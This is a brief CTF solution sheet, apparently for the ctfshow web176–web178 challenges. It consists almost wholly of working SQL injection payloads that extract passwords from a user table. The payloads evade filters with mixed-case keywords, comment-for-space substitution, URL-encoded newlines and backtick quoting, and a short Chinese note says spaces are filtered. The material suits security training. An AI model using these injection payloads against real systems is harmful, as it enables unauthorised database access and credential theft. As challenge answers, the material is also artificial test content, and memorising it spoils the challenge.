web176
-1' uNion sElect 1,2,password from ctfshow_user --+
web177
过滤空格
'-1/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag
web178
-1'union%0aselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3